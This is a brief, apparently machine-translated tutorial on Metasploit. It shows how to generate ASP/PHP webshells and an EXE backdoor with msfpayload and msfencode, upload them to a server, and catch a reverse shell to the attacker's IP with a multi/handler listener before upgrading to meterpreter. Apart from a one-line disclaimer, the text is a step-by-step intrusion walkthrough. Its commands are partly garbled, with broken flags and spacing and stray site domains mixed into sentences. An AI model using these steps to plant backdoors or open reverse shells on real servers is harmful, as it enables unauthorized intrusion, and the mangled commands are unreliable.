Metasploit-Privilege Escalation using webshell

The methods involved in this article can only be tested on authorized machines.
 
First, I suggest you check the usage of meterpreter on the Internet. Read this article to understand why msf is used for permission elevation (because msf has a meterpreter which is very powerful ^_^)
Metasploit has two tools: msfpayload and msfencode. These tools not only generate exe-type backdoors, but also generate webshells of the web script type. By generating webshells, you can set listeners to access the webshell url, if you are lucky, you can generate a session for further use.
The following describes the specific usage methods.
We can view the payload in msf through the command and remember its location: Use the following command to generate a webshell, which is similar to the usage of msfpayload in the front, however, a webpage script file is generated here:
Generate webshell
Msfpayload windows/meterpreter/reverse_tcp LHOST = your_ip | msfencode-t asp-o webshell. asp
Then upload the webshell to the server (this step requires the upload permission .)
Then start msfconsole
Enter use exploits/multi/handler,
Set PAYLOAD windows/meterpreter/reverse_tcp (here, payload is the same as msfpayload on the front.
Set LHOST your_ip,
Execute exploit, www.2cto.com
Then access the webshell url, here use curl to access the curl http://www.bkjia.com/webshell. asp. If exploit is successfully executed, you can see that meterpreter shell is returned in msfconsole. If meterpreter is not checked online, there are many.
However, when I use netbox to set up an asp environment, I always encounter execution errors. I hope that the reader can use it again after the actual verification is successful.
Here, asp webshell can also generate php webshell. jsp webshell needs to use the-t parameter to specify the Script Type in msfencode. I think php webshell is easier to succeed.
 
In addition, if the server has the permission to upload and execute the file to be uploaded, you can upload a backdoor generated by msfpayload, set the listener, execute the backdoor, return a session, and convert the session to meterpreter, in this way, you can easily use various features of meter. Here is a step: (the premise is above and explained)
1. msfpayload windows/shell_reverse_tcp LHOST = your_ip R | msfencode-t exe-o test.exe
2. Open msfconsole (another terminate Terminal)
3. set listening (Listening seems to be very advanced, don't be scared by it): use exploits/multi/handler, set LHOST = your_ip, execute exploit
4、upload test.exe to the server
If test.exe is executed on the server in the 5th region, a shell can be returned.
6. Convert windows shell to meterpreter shell: Because the payload used is shell_reverse_tcp, a shell is returned after the name is obtained. A windows shell (windows Command Prompt) is returned in the listener ), instead of a meterpreter shell, you need to convert it by pressing Ctrl + z to run windows shell in the background, and then executing the sessions command to check the shell session
Run sessions-u number (number indicates the windows shell session number you have found. In this way, a meterpreter shell is generated, and the powerful functions of meterpreter can be used. An error may also occur. Read the error information carefully and copy a part of the information to google.
Readers may have some questions: Since the exe file can be uploaded and executed, why is it more convenient to directly upload a powerful Trojan. I would like to say that msf has a powerful Meterpreter.
To sum up, you can give it a try. Some payloads in payloads cannot be used, and some unexpected discoveries may be made.